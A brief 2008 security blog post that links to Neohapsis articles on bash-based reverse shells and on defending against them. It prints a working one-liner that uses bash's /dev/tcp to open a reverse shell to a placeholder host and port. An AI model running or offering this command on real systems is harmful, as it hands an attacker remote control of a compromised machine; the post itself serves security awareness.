by kriggins on April 21, 2008
in Tips
In this post, I referenced a very interesting article over at Neohapsis about easily setting up a reverse shell using just the bash shell. Well there is a new post up which talks about the flip side of the equation; How to stop reverse shells.
Like the first post, this one is also a good read.
Neohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell. Used to be you could remove netcat, wget, ftp, etc... and make it much more difficult for a reverse shell to be started. Enter the ever friendly and helpful Bash shell.
All you need is:
$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
and tadaa, reverse shell.
Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
Kevin Riggins